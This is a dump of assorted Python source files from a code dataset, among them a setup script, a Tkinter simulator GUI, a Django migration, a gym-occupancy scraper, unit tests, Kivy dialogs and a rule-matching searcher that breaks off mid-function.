text stringlengths 38 1.54M |
|---|
from setuptools import setup, find_packages
setup(
name='Canvas',
version='0.1.0',
description='',
long_description='',
author='Robert Cudmore',
author_email='robert.cudmore@gmail.com',
url='https://github.com/cudmore/bImPy',
keywords=['in vivo', 'two photon', 'laser scanning microscopy'],
packages=find_packages(),
entry_points={
'console_scripts': [
'canvas=canvas.bCanvasApp:main',
]
},
install_requires=[
'opencv-python-headless',
'pyserial'
],
extras_require={
'bioformata': ['python-bioformats', 'javabridge'],
}
)
'''
numpy
PyQt5
QtPy
napari
matplotlib
tifffile
scikit-image
h5py
skan # skeleton tracing (requires numba and pandas)
numba
pandas
PyQtGraph
qdarkstyle
'''
|
import logging
import subprocess
logger = logging.getLogger()
def compile_video(photos_dir, output_filename, photos_per_second=4, photos_extension=None):
photos_extension = 'png' if photos_extension is None else photos_extension
logger.info('compiling timelapse (photos per second: {photos_per_second})'.format(
photos_per_second=photos_per_second,
))
# TODO ensure output_filename ends with .mp4
photos_pattern = '{}/image%05d.{}'.format(photos_dir, photos_extension)
try:
subprocess.check_call([
'ffmpeg',
'-loglevel', 'warning',
'-framerate', str(photos_per_second),
'-i', photos_pattern,
'-c:v', 'libx264',
'-s:v', '4k',
'-r', '30',
'-pix_fmt', 'yuv420p',
output_filename,
])
except subprocess.CalledProcessError as error:
logger.error('Error encountered while generating video using ffmpeg', exc_info=True)
|
from LinkedList import LinkedList
class KthToLastElement:
def kthlast(self, k,h):
if k > h.length():
return -1
temp = h.head
for i in range(h.length()-k):
temp = temp.next
return temp.data
o = LinkedList()
o.add(1)
o.add(2)
o.add(3)
o.add(4)
o.add(5)
o.add(6)
o.add(7)
res= KthToLastElement().kthlast(7,o)
print(res) |
def main():
num =int(input())
for i in range(2,num+2):
for j in range(1,i):
print(j,end=" ")
print()
if (__name__=="__main__"):
main()
|
import tkinter
from tkinter import messagebox
from tkinter.ttk import Combobox
from vanderpolgenerator import VanDerPolGenerator
from plot import Plot
import re
import sys
class GUI(tkinter.Tk):
def __init__(self,):
tkinter.Tk.__init__(self)
self.title('Van der Pol Generator Visualizer v1.0')
self.geometry('800x450')
self.colors = self.get_colors()
self.parameters_label = tkinter.Label(self, text='Parameters', font=("Arial", 16))
self.parameters_label.place(x=20, y=17)
self.l_parameter_label = tkinter.Label(self, text='l = ', font=('Times New Roman', 13, 'italic'))
self.l_parameter_label.place(x=20, y=60)
self.l_parameter_entry = tkinter.Entry(self)
self.l_parameter_entry.config(width=8)
self.l_parameter_entry.place(x=60, y=63)
self.m_parameter_label = tkinter.Label(self, text='m = ', font=('Times New Roman', 13, 'italic'))
self.m_parameter_label.place(x=20, y=90)
self.m_parameter_entry = tkinter.Entry(self)
self.m_parameter_entry.config(width=8)
self.m_parameter_entry.place(x=60, y=93)
self.start_x_label = tkinter.Label(self, text='Start X = ', font=('Arial', 11))
self.start_x_label.place(x=20, y=160)
self.start_x_entry = tkinter.Entry(self)
self.start_x_entry.config(width=8)
self.start_x_entry.insert(0, '0.0')
self.start_x_entry.place(x=90, y=163)
self.start_y_label = tkinter.Label(self, text='Start Y = ', font=('Arial', 11))
self.start_y_label.place(x=20, y=180)
self.start_y_entry = tkinter.Entry(self)
self.start_y_entry.config(width=8)
self.start_y_entry.insert(0, '0.1')
self.start_y_entry.place(x=90, y=183)
self.h_label = tkinter.Label(self, text='h = ', font=('Arial', 11))
self.h_label.place(x=180, y=160)
self.steps_label = tkinter.Label(self, text='Steps = ', font=('Arial', 11))
self.steps_label.place(x=180, y=180)
self.h_entry = tkinter.Entry(self)
self.h_entry.config(width=8)
self.h_entry.insert(0, '0.01')
self.h_entry.place(x=210, y=163)
self.steps_entry = tkinter.Entry(self)
self.steps_entry.config(width=8)
self.steps_entry.insert(0, '10000')
self.steps_entry.place(x=240, y=183)
self.color_label = tkinter.Label(self, text='Color', font=('Arial', 11))
self.color_label.place(x=20, y=240)
self.color_box = Combobox(self, values=self.colors)
self.color_box.set('Black')
self.color_box.place(x=20, y=265)
self.add_button = tkinter.Button(self, text='Add', font=('Arial', 13), width=10, command=self.add_graphic)
self.add_button.place(x=220, y=260)
self.show_button = tkinter.Button(self, text='SHOW', font=('Arial', 14), width=15, height=2, command=self.show)
self.show_button.place(x=300, y=350)
self.plot = Plot()
self.info_labels = tkinter.Listbox(self, selectmode='MULTIPLE', width=60, height=17)
self.info_labels.bind('<<ListboxSelect>>', self.on_select)
self.info_labels.place(x=420, y=20)
def on_select(self, event):
selected = event.widget.curselection()
if not selected:
return
num = selected[0]
self.plot.remove(0)
self.info_labels.delete(num)
def show(self):
self.plot.draw()
def get_values(self):
try:
l_parameter = float(self.l_parameter_entry.get())
except ValueError:
self.show_error('l parameter is invalid')
return
try:
m_parameter = float(self.m_parameter_entry.get())
except ValueError:
self.show_error('m parameter is invalid')
return
start_x = float(self.start_x_entry.get())
start_y = float(self.start_y_entry.get())
h = float(self.h_entry.get())
steps = int(self.steps_entry.get())
color = self.color_box.get()
color = re.sub('\s*', '', color)
return l_parameter, m_parameter, (start_x, start_y), h, steps, color
def add_graphic(self):
values = self.get_values()
if not values:
return
l, m, start, h, steps, color = values
try:
generator = VanDerPolGenerator(l, m, start, h, steps)
self.plot.add(generator, color)
self.info_labels.insert('end', self.plot.str(-1))
except:
descr = sys.exc_info()[0]
self.show_error(descr)
def show_error(self, description):
messagebox.showerror('Error', description)
def get_colors(self):
file = open('all_colors.txt')
colors = file.readlines()
without_spaces = []
for color in colors:
new_color = color.replace('\s', '')
without_spaces.append(new_color)
file.close()
return without_spaces
if __name__ == "__main__":
app = GUI()
app.mainloop()
|
# -*- coding: utf-8 -*-
"""
lantz.ui.scan
~~~~~~~~~~~~~
A Scan frontend and Backend. Requires scan.ui
:copyright: 2015 by Lantz Authors, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import time
import math
from enum import IntEnum
from lantz.utils.qt import QtCore, QtGui
from lantz.ui.app import Frontend, Backend, start_gui_app
def _linspace_args(start, stop, step_size=None, length=None):
"""Return the step_size and length for a given linspace
where step_size OR length is defined.
"""
if step_size is None:
if length is None:
length = 10
step_size = (stop - start) / (length + 1)
else:
if length is not None:
raise ValueError('step_size and length cannot be both different from None')
length = math.floor((stop - start) / step_size) + 1
return step_size, length
def _linspace(start, stop, step_size=None, length=None):
"""Yield a linear spacing from start to stop
with defined step_size OR length.
"""
step_size, length = _linspace_args(start, stop, step_size, length)
for i in range(length):
yield start + i * step_size
class StepsMode(IntEnum):
"""Step calculation modes.
"""
#: fixed step size.
step_size = 0
#: fixed step count.
step_count = 1
class Scan(Backend):
"""A backend that iterates over an list of values,
calling a `body` function in each step.
"""
#: Signal emitted before starting a new iteration
#: Parameters: loop counter, step value, overrun
iteration = QtCore.Signal(int, int, bool)
#: Signal emitted when the loop finished.
#: The parameter is used to inform if the loop was canceled.
loop_done = QtCore.Signal(bool)
#: The function to be called. It requires three parameters.
#: counter - the iteration number.
#: current value - the current value of the scan.
#: overrun - a boolean indicating if the time required for the operation
#: is longer than the interval.
#: :type: (int, int, bool) -> None
body = None
#: To be called before the body. Same signature as body
_pre_body = None
#: To be called after the body. Same signature as body
_post_body = None
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._active = False
self._internal_func = None
def stop(self):
"""Request the scanning to be stop.
Will stop when the current iteration is finished.
"""
self._active = False
def start(self, body, interval=0, steps=(), timeout=0):
"""Request the scanning to be started.
:param body: function to be called at each iteration.
If None, the class body will be used.
:param interval: interval between starts of the iteration.
If the body takes too long, the iteration will
be as fast as possible and the overrun flag will be True
:param steps: iterable
:param timeout: total time in seconds that the scanning will take.
If overdue, the scanning will be stopped.
If 0, there is no timeout.
"""
self._active = True
body = body or self.body
iterations = len(steps)
def internal(counter, overrun=False, schedule=QtCore.QTimer.singleShot):
if not self._active:
self.loop_done.emit(True)
return
st = time.time()
self.iteration.emit(counter, iterations, overrun)
if self._pre_body is not None:
self._pre_body(counter, steps[counter], overrun)
if body is not None:
body(counter, steps[counter], overrun)
if self._post_body is not None:
self._post_body(counter, steps[counter], overrun)
if iterations and counter + 1 == iterations:
self._active = False
self.loop_done.emit(False)
return
elif not self._active:
self.loop_done.emit(True)
return
sleep = interval - (time.time() - st)
schedule(sleep * 1000 if sleep > 0 else 0,
lambda: self._internal_func(counter + 1, sleep < 0))
self._internal_func = internal
if timeout:
QtCore.QTimer.singleShot(timeout * 1000, self.stop)
QtCore.QTimer.singleShot(0, lambda: self._internal_func(0))
class ScanUi(Frontend):
"""A frontend to the Scan backend.
Allows you to create linear sequence of steps between a start a stop,
with selectable step size or number of steps.
"""
gui = 'scan.ui'
auto_connect = False
#: Signal emitted when a start is requested.
#: The parameters are None, interval, vector of steps
request_start = QtCore.Signal(object, object, object)
#: Signal emitted when a stop is requested.
request_stop = QtCore.Signal()
def connect_backend(self):
super().connect_backend()
self.widget.start_stop.clicked.connect(self.on_start_stop_clicked)
self.widget.mode.currentIndexChanged.connect(self.on_mode_changed)
self.widget.step_count.valueChanged.connect(self.recalculate)
self.widget.start.valueChanged.connect(self.recalculate)
self.widget.stop.valueChanged.connect(self.recalculate)
self.widget.step_size.valueChanged.connect(self.recalculate)
self.widget.progress_bar.setValue(0)
self._ok_palette = QtGui.QPalette(self.widget.progress_bar.palette())
self._overrun_palette = QtGui.QPalette(self.widget.progress_bar.palette())
self._overrun_palette.setColor(QtGui.QPalette.Highlight,
QtGui.QColor(QtCore.Qt.red))
self.backend.iteration.connect(self.on_iteration)
self.backend.loop_done.connect(self.on_loop_done)
self.request_start.connect(self.backend.start)
self.request_stop.connect(self.backend.stop)
def on_start_stop_clicked(self, value=None):
if self.backend._active:
self.widget.start_stop.setText('...')
self.widget.start_stop.setEnabled(False)
self.request_stop.emit()
return
self.widget.start_stop.setText('Stop')
self.widget.start_stop.setChecked(True)
vals = [getattr(self.widget, name).value()
for name in 'start stop step_size step_count wait'.split()]
start, stop, step_size, step_count, interval = vals
steps = list(_linspace(start, stop, step_size))
self.request_start.emit(None, interval, steps)
def recalculate(self, *args):
mode = self.widget.mode.currentIndex()
if mode == StepsMode.step_size:
step_size, length = _linspace_args(self.widget.start.value(),
self.widget.stop.value(),
self.widget.step_size.value())
self.widget.step_count.setValue(length)
elif mode == StepsMode.step_count:
step_size, length = _linspace_args(self.widget.start.value(),
self.widget.stop.value(),
length=self.widget.step_count.value())
self.widget.step_size.setValue(step_size)
def on_iteration(self, counter, iterations, overrun):
pbar = self.widget.progress_bar
if not counter:
if iterations:
pbar.setMaximum(iterations + 1)
else:
pbar.setMaximum(0)
if iterations:
pbar.setValue(counter + 1)
if overrun:
pbar.setPalette(self._overrun_palette)
else:
pbar.setPalette(self._ok_palette)
def on_mode_changed(self, new_index):
if new_index == StepsMode.step_size:
self.widget.step_count.setEnabled(False)
self.widget.step_size.setEnabled(True)
elif new_index == StepsMode.step_count:
self.widget.step_count.setEnabled(True)
self.widget.step_size.setEnabled(False)
self.recalculate()
def on_loop_done(self, cancelled):
self.widget.start_stop.setText('Start')
self.widget.start_stop.setEnabled(True)
self.widget.start_stop.setChecked(False)
if self.widget.progress_bar.maximum():
self.widget.progress_bar.setValue(self.widget.progress_bar.maximum())
else:
self.widget.progress_bar.setMaximum(1)
if __name__ == '__main__':
def func(current, total, overrun):
print('func', current, total, overrun)
app = Scan()
app.body = func
start_gui_app(app, ScanUi)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2020-01-29 12:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('favourites', '0002_auto_20200123_1700'),
]
operations = [
migrations.AlterField(
model_name='favourites',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
# print("Ahmeeada".strip("A"))
# imelde="more mayhem","Imelda May","2011",((1,"pulling the Rug"),(2,"psycho"),(3,"mayhem"),(4,"Kentisch town waltz"))
# print(imelde)
# with open("imelda3txt",'w')as inzwischen:
# print(imelde,file=inzwischen)
with open("imelda3.txt",'r')as inZwischen:
content=inZwischen.readline() # it is not easy to read it back into atuple variables,therefore we need a eval function
print(content)
Aha=eval(content)
print(Aha)
title,artist,year,track=content
print(title)
print(artist)
print(year)
print(track) |
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import time as tm
import datetime as dtm
import os
mainInDir = "C:/Users/jzhao/Documents/Python Scripts/MS/01_DescriptiveStats/01_Data/"
mainTimeStamp = dtm.datetime.fromtimestamp(tm.time()).strftime('%Y.%m.%d.%H.%M.%S')
mainOutDir = "./Results/" + mainTimeStamp + "/"
ensureDir(mainOutDir)
def ensureDir(f):
d = os.path.dirname(f)
if not os.path.exists(d):
os.makedirs(d)
|
import json
import logging
import time
from datetime import datetime
import requests
from influxdb import InfluxDBClient
logging.basicConfig(filename="my_app2.log", level=logging.INFO)
def return_count():
# Do the request
headers = {"Content-Type": "application/json"}
url = "https://portal.rockgympro.com/portal/public/a67951f8b19504c3fd14ef92ef27454d/occupancy?&iframeid=occupancyCounter&fId=1784"
r = requests.get(url, data=headers)
# Parse text
txt = r.text.replace("\n", "").replace("\\", "")
start_index = txt.find("data") + 6
end_index = txt[start_index:].find("};") + start_index - 1
subset = txt[start_index:end_index].replace("'", '"').replace(" ", "")
subset = subset[:-1] + "}"
# Convert to json
res_json = json.loads(subset)
return res_json
def main():
while True:
try:
logging.info("Running extraction...")
res = return_count()
for centre in res:
vals = res[centre]
current = float(vals["count"])
cap = float(vals["capacity"])
cur_time = str(datetime.utcnow())
client = InfluxDBClient("localhost", 8086, database="ravensdb")
json_body = [
{
"measurement": "climbers",
"time": cur_time,
"tags": {"centre": centre},
"fields": {"value": current, "capacity": cap},
}
]
client.write_points(json_body)
logging.info(f"Finished extraction, found {current} climbers. Sleeping...")
time.sleep(300)
except Exception as e:
logging.exception(e)
if __name__ == "__main__":
main()
|
list1 = [1,2,3,4,5,6]
list2 = [9,8,7,6,3,5]
len1=len(list1)
len2=len(list2)
if len1 == len2 :
print('both list have equal length')
else:
print('both list doesnt have equal length')
|
from math import sqrt
def pearson_distance(v1, v2):
"""
Calculate Pearson Distance between v1 and v2
:param v1:
:param v2:
:return: float [0,1]. In this case we get close to 0 if items are similar
"""
# Simple Sums
sum1 = sum(v1)
sum2 = sum(v2)
min_length = min(len(v1), len(v2))
# Sum of the squares
sum1_square = sum([pow(v, 2) for v in v1])
sum2_square = sum([pow(v, 2) for v in v2])
# sum of the products
product_sum = sum([v1[i] * v2[i] for i in range(min_length)])
# Calculate Pearson Score
num = product_sum - (sum1 * sum2 / len(v1))
den = sqrt((sum1_square - pow(sum1, 2) / min_length) * (sum2_square - pow(sum2, 2) / min_length))
if den == 0:
return 1
return 1.0 - num / den
|
#!/usr/bin/env python3
"""tests for dna.py"""
import os
import random
import re
import string
from subprocess import getstatusoutput, getoutput
prg = './dna.py'
# --------------------------------------------------
def test_exists():
"""exists"""
assert os.path.isfile(prg)
# --------------------------------------------------
def test_no_arg_and_usage():
"""usage"""
for flag in ['', '-h', '--help']:
out = getoutput(f'{prg} {flag}')
assert out.lower().startswith('usage')
# --------------------------------------------------
def run_single(base):
"""Run a single base test"""
num = random.randint(1, 10)
given = base * num
rv, out = getstatusoutput(f'{prg} {given}')
assert rv == 0
cmp = base.upper()
expected = f'{num} 0 0 0' if cmp == 'A' else \
f'0 {num} 0 0' if cmp == 'C' else \
f'0 0 {num} 0' if cmp == 'G' else \
f'0 0 0 {num}'
assert out == expected
# --------------------------------------------------
def test_a_upper():
"""A"""
run_single('A')
# --------------------------------------------------
def test_a_lower():
"""a"""
run_single('a')
# --------------------------------------------------
def test_c_upper():
"""C"""
run_single('C')
# --------------------------------------------------
def test_c_lower():
"""c"""
run_single('c')
# --------------------------------------------------
def test_g_upper():
"""G"""
run_single('G')
# --------------------------------------------------
def test_g_lower():
"""g"""
run_single('g')
# --------------------------------------------------
def test_t_upper():
"""T"""
run_single('T')
# --------------------------------------------------
def test_t_lower():
"""t"""
run_single('t')
# --------------------------------------------------
def test_rosalind_example():
"""From http://rosalind.info/problems/dna/"""
dna = ('AGCTTTTCATTCTGACTGCAACGGGCAATATGTCTCTGTGTGGATT'
'AAAAAAAGAGTGTCTGATAGCAGC')
rv, out = getstatusoutput(f'{prg} {dna}')
assert rv == 0
assert out == '20 12 17 21'
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import os
os.putenv('LANG', 'en_US.UTF-8')
os.putenv('LC_ALL', 'en_US.UTF-8')
import socket
from http.server import BaseHTTPRequestHandler, HTTPServer
import time
import json
import requests
import random
import cgi
from scoreSong import init, scoreMp3
model = init()
import youtube_dl
postprocessors = []
postprocessors.append({
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': None,
'nopostoverwrites': None,
})
ydl_opts = {
'postprocessors': postprocessors,
'outtmpl': 'songs/%(title)s-%(id)s.%(ext)s'
}
ydl = youtube_dl.YoutubeDL(ydl_opts)
hostName = "0.0.0.0"
hostPort = 5000
class MyServer(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200, "ok")
self.send_header('Content-type', 'text/html')
self.send_header('Access-Control-Allow-Credentials', 'true')
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header("Access-Control-Allow-Headers", "X-Requested-With, Content-type")
self.end_headers()
# GET is for clients geting the predi
def do_GET(self):
self.send_response(200)
print("TEST")
#self.wfile.write(bytes("<p>You accessed path: %s</p>" % self.path, "utf-8"))
# POST is for submitting data.
def do_POST(self):
self._set_headers()
print( "incomming http: ", self.path )
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST'})
url = form.getvalue("url")
print(url)
info_dict = ydl.extract_info(url, download=False)
title = info_dict['title'].replace('"',"'").replace(":"," -")
mp3fn = title + '-' + info_dict['id']
if not os.path.exists('songs/' + mp3fn + '.mp3'):
ydl.download([url])
scoreMp3(mp3fn, model)
self.wfile.write(json.dumps({"filename":mp3fn}).encode('utf-8'))
return
try:
while True:
pass
except KeyboardInterrupt:
pass
myServer = HTTPServer((hostName, hostPort), MyServer)
print(time.asctime(), "Server Starts - %s:%s" % (hostName, hostPort))
try:
myServer.serve_forever()
except KeyboardInterrupt:
pass
myServer.server_close()
print(time.asctime(), "Server Stops - %s:%s" % (hostName, hostPort)) |
from sklearn.tree import DecisionTreeClassifier
import numpy as np
import tensorflow as tf #내가추가한것
def DecisionTree(csv_path):
xy = np.loadtxt(csv_path, delimiter=',', dtype=np.float32)
x_train = xy[:, 0:-1]
y_train = xy[:, [-1]]
x_test = []
x_test.append(x_train[len(x_train) - 1])
x_test = np.array(x_test)
x_test = x_test[:, 0:20]
estimator = DecisionTreeClassifier(criterion='gini', max_depth=None, max_leaf_nodes=None, min_samples_split=2, min_samples_leaf=1, max_features=None)
estimator.fit(x_train, y_train)
y_predict = estimator.predict(x_test)
return y_predict |
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.websocket import EchoWebSocket
import atexit
# the following 4 lines are suggested in the cherrypy website:
# http://tools.cherrypy.org/wiki/ModWSGI
cherrypy.config.update({'environment': 'embedded'})
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
cherrypy.engine.start(blocking=False)
atexit.register(cherrypy.engine.stop)
# initialize the websocket plugin of ws4py
WebSocketPlugin(cherrypy.engine).subscribe()
cherrypy.tools.websocket = WebSocketTool()
# my application
class Root(object):
def index(self):
return 'I work!'
def ws(self):
print('THIS IS NEVER PRINTED :(')
index.exposed=True
ws.exposed=True
# registering the websocket
conf={'/ws':{'tools.websocket.on': True,'tools.websocket.handler_cls': EchoWebSocket}}
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
stream = logging.StreamHandler()
stream.setLevel(logging.INFO)
logger.addHandler(stream)
# lets go!
application = cherrypy.Application(Root(), script_name='', config=conf) |
def print_line(char,time):
"""打印单行分割线
:param char: 分割字符
:param time: 重复次数
"""
print(char * time)
def print_lines(char,time):
"""打印多行分割线
:param char: 分割线使用的分割字符
:param time: 分割线重复的次数
"""
row = 0
while row <5:
print_line(char,time)
row += 1
name = "黑马程序员" |
from dialog_api import messaging_pb2
from google.protobuf.wrappers_pb2 import StringValue
from dialog_bot_sdk.entities.media.ImageMedia import ImageLocation
class WebPageMedia:
def __init__(self, url: str, title: str = "", description: str = "", image: ImageLocation = None):
self.url = url
self.title = title
self.description = description
self.image = image
def to_api(self) -> messaging_pb2.WebpageMedia:
if self.image is not None:
image = self.image.to_api()
else:
image = None
return messaging_pb2.WebpageMedia(url=StringValue(value=self.url), title=StringValue(value=self.title),
description=StringValue(value=self.description), image=image)
@classmethod
def from_api(cls, web_page: messaging_pb2.WebpageMedia) -> 'WebPageMedia':
return cls(web_page.url, web_page.title, web_page.description, ImageLocation.from_api(web_page.image))
def __dict__(self):
return {"url": self.url, "title": self.title, "description": self.description, "image": self.image.__dict__()}
def __str__(self):
return "WebPageMedia({})".format(self.__dict__())
|
from kivy_soil.kb_system.compat_widgets.popup import AppPopup
from utils import get_containing_directory, open_directory
from utils import seconds_to_minutes_hours
from media_info import cache as media_cache
from kivy.properties import StringProperty
from kivy.uix.boxlayout import BoxLayout
from kivy_soil.kb_system import keys
from kivy.uix.popup import Popup
from kivy.metrics import dp, cm
from kivy.uix.label import Label
from kivy.lang import Builder
import global_vars as gvars
Builder.load_string('''
#: import ConditionLayout widgets.condition_layout.ConditionLayout
#: import FocusButtonScroller widgets.focus_button.FocusButtonScroller
#: import Clipboard kivy.core.clipboard.Clipboard
<MediaPropertiesDialogText>:
orientation: 'horizontal'
size_hint: 1, None
height: tinput.height
Label:
id: label
size_hint_x: None
width: int(root.width * 0.2)
valign: 'top'
height: tinput.height
text_size: self.size
text: root.t_key
CompatTextInputScroller:
id: tinput
size_hint: None, None
width: int(root.width * 0.8)
text_size: self.width, None
height: self.minimum_height
text_size: self.width, None
text: root.t_value
multiline: True
foreground_color: app.mtheme.text
background_active: ''
background_normal: ''
background_disabled_normal: ''
background_color: (0.3, 0.3, 0.8, 0.15)
<MediaPropertiesDialog>:
size_hint: 0.8, 0.7
title: 'Media properties dialog'
ScrollView:
id: scroller
do_scroll_x: False
BoxLayout:
size_hint: 1, None
height: self.minimum_height
orientation: 'vertical'
spacing: app.mlayout.button_height
GridLayout:
id: grid
size_hint: 0.9, None
pos_hint: {'center_x': 0.5}
size_hint_y: None
height: self.minimum_height
cols: 1
spacing: int(cm(0.3))
ConditionLayout:
size_hint: 0.9, None
pos_hint: {'center_x': 0.5}
height: app.mlayout.button_height
condition: True if root.containing_directory else False
spacing: app.mlayout.spacing * 4
FocusButtonScroller:
id: open_fld_button
scroll_when_focused: scroller
is_subfocus: True
text: 'Open containing directory'
on_release: root.open_cont_dir()
FocusButtonScroller:
id: copy_path_button
scroll_when_focused: scroller
is_subfocus: True
text: 'Copy path'
on_release: Clipboard.copy(root.mpath)
''')
class MediaPropertiesDialogText(BoxLayout):
t_key = StringProperty()
t_value = StringProperty()
def __init__(self, key, value, **kwargs):
super(MediaPropertiesDialogText, self).__init__(**kwargs)
self.t_key = str(key)
self.t_value = str(value)
class MediaPropertiesDialog(AppPopup):
'''Takes a dictionary as first __init__ argument and adds
Label widget pairs in boxlayouts to display, has handling for
media data'''
containing_directory = StringProperty()
'''Stores directory path which contains media file when a path is found
in media_dict argument'''
mpath = StringProperty()
'''Stores media file path when a path is found in media_dict argument'''
ignored_properties = ['id', 'state']
def __init__(self, media_dict, **kwargs):
super(MediaPropertiesDialog, self).__init__(**kwargs)
self.remove_focus_on_touch_move = False
self.grab_focus = True
self.subfocus_widgets = [
self.ids.open_fld_button, self.ids.copy_path_button]
def add_content_widgets(self, media_dict):
'''Find all important information in media_dict and add widgets to self
'''
grid = self.ids.grid
# Adds key and value pairs from media_dict argument
button_list = []
for k, v in media_dict.items():
if k in self.ignored_properties:
continue
button_list.append((k, v))
# Attempts to get and add file tags
# and other important information from global media cache
mpath = media_dict.get('path', '')
if mpath:
self.containing_directory = get_containing_directory(mpath)
self.mpath = mpath
mc = media_cache.get(mpath, None)
if mc:
duration = mc.get('duration', None)
if duration:
duration = seconds_to_minutes_hours(duration)
button_list.append(('duration', duration))
mc_format = mc.get('format', None)
if mc_format:
for k, v in mc_format.items():
if k[:4] == 'TAG:':
k = k[4:]
button_list.append((k, v))
for k, v in button_list:
btn = MediaPropertiesDialogText(k, v)
tinput = btn.ids.tinput
tinput.is_subfocus = True
tinput.scroll_when_focused = self.ids.scroller
self.subfocus_widgets.insert(-2, tinput)
grid.add_widget(btn)
def open_cont_dir(self):
'''Open directory that contains file'''
open_directory(self.containing_directory)
def dismiss(self):
super(MediaPropertiesDialog, self).dismiss()
self.remove_from_focus(prev_focus=True)
# self.parent.remove_widget(self)
@staticmethod
def open_diag(media_dict):
'''Method for creating and opening dialog'''
dialog = MediaPropertiesDialog(media_dict)
dialog.add_content_widgets(media_dict)
dialog.open()
return dialog
|
from App import views
from django.urls import path
#写上app_name
app_name = 'App01'
urlpatterns = [
path('login/',views.login,name='login'),
path('mark/',views.reply,name='mark'),
path('home/',views.index,name='home'),
path('logout/',views.logout,name='logout'),
] |
import os
import matplotlib.pyplot as plt
files = os.listdir("../../datasets/UTKFace-curated/") # -curated
print("Total files: "+str(len(files)))
gender_count = [0, 0]
ethnicity_count = [0, 0, 0, 0, 0]
age_count = [0 for col in range(120)]
for f in files:
tmp = f.split("_")
if len(tmp)!=4: continue
age_count[int(tmp[0])] += 1
gender_count[int(tmp[1])] += 1
ethnicity_count[int(tmp[2])] += 1
print(gender_count)
print(ethnicity_count)
plt.bar(range(120), age_count)
plt.show()
|
"""
在构建好的规则Trie树中,找出query所有可以匹配的组合
"""
import config
from items import *
from post_handle import apply_post, get_idx_slot, trans_by_post
class Searcher:
"""
rule_trie: 编译好的Trie树类
rule_info: 规则的全局信息,后处理,搜索配置等
ac_machie: 词典和关键字的AC自动机
"""
def __init__(self, rule_trie, rule_info, ac_machine):
self.rule_trie = rule_trie
self.rule_info = rule_info
self.ac_machine = ac_machine
def basic_set(self, dialog):
""" 搜索前预处理:
1. 找出所有词
2. 预处理需要特殊规则: plus及需要后处理的非export规则
3. 删除用不到的tag, 排序
"""
self.AM = self.ac_machine.match(dialog)
special_post = self.special_preprocess(dialog)
if len(self.rule_trie.keeped_tags) > 0:
self.AM.delete_tag(self.rule_trie.keeped_tags)
self.AM.sorted()
self.AM.build_word_next_idx()
#print(self.AM.matched)
return special_post
# 按照贪心策略搜索
def max_match(self, dialog):
special_post = self.basic_set(dialog)
conf = config.get_conf(None, "search")
matched_ans = self._greed_match(self.rule_trie.export_trie, conf)
return matched_ans, special_post
# 完全搜索所有可能
def search_match(self, dialog):
special_post = self.basic_set(dialog)
conf = config.get_conf(None, "search")
matched_ans = self._search_match(self.rule_trie.export_trie, conf)
return matched_ans, special_post
def _search_match(self, fingerprint, conf):
self.AM.reset()
all_matched = []
has_seen = set()
for i in range(len(self.AM.matched)):
matched_ans = self._search_match_helper(i, fingerprint, has_seen, conf)
all_matched.extend(matched_ans)
return all_matched
# 深度优先搜索
def _search_match_helper(self, i, fingerprint, has_seen, conf):
self.AM.iter_init(i)
best_ans = []
stack = [("", self.AM.get_state(), tuple())]
def __search_helper(new_tp, new_matched_eles, new_state):
search_step_fingerprint = "%d&%s"%(new_state[0], new_tp)
if search_step_fingerprint in has_seen: return
has_seen.add(search_step_fingerprint)
if new_tp in fingerprint:
if fingerprint[new_tp].isLeaf():
best_ans.append(MatchedItem(new_tp, new_matched_eles, fingerprint[new_tp].match_list))
stack.append((new_tp, new_state, new_matched_eles))
while len(stack):
tp, state, matched_eles = stack.pop(0)
self.AM.reset_state(state)
if fingerprint[tp].is_next_any():
any_list = fingerprint[tp].anys
# 如果规则最后是__ANY__
for any_pat in any_list:
new_tp = "%s#%s"%(tp, any_pat.to_pat())
search_step_fingerprint = "%d&%s"%(state[0], new_tp)
if search_step_fingerprint in has_seen: continue
has_seen.add(search_step_fingerprint)
if new_tp in fingerprint and fingerprint[new_tp].isLeaf():
d = any_pat.get_max_dist(state[1], self.AM.dialog_length - 1)
if d > 0:
new_matched_eles = matched_eles + ((state[1] + 1, d),)
best_ans.append(MatchedItem(new_tp, new_matched_eles, fingerprint[new_tp].match_list))
# 查询规则中间是__ANY__
for i in range(1, 25):
ele = self.AM.look_next(i)
if ele is None: break
d = self.AM.get_word_dist(ele.start)
for any_pat in any_list:
if any_pat.is_valid(d):
new_tp = "%s#%s#%s"%(tp, any_pat.to_pat(), ele.tag)
new_state = (self.AM._i + i, ele.end)
new_matched_eles = matched_eles + ((ele.start - d, ele.start - 1), (ele.start, ele.end))
__search_helper(new_tp, new_matched_eles, new_state)
while self.AM.has_next():
ele = self.AM.get_next()
# 大于限定距离; break
if self.AM.get_word_dist(ele.start) > conf["max_dist"]:
break
new_tp = "%s#%s"%(tp, ele.tag)
new_matched_eles = matched_eles + ((ele.start, ele.end),)
new_state = (self.AM._i, ele.end)
__search_helper(new_tp, new_matched_eles, new_state)
if new_tp not in fingerprint and len(matched_eles) > 0:
if conf["no_skip_atom"] and ele.tag_type in "0":
break_flag = True
# 中间有atom, 且不准跨越atom
break
elif conf["no_skip_any"]:
break
return best_ans
def _greed_match(self, fingerprint, conf):
self.AM.reset()
all_matched = []
for i in range(len(self.AM.matched)):
matched_ans = self._greed_match_helper(i, fingerprint, conf)
all_matched.extend(matched_ans)
return all_matched
# 对规则的最长匹配
def _greed_match_helper(self, i, fingerprint, conf):
self.AM.iter_init(i)
best_ans = []
stack = [("", self.AM.get_state(), tuple())]
while len(stack):
tp, state, matched_eles = stack.pop(0)
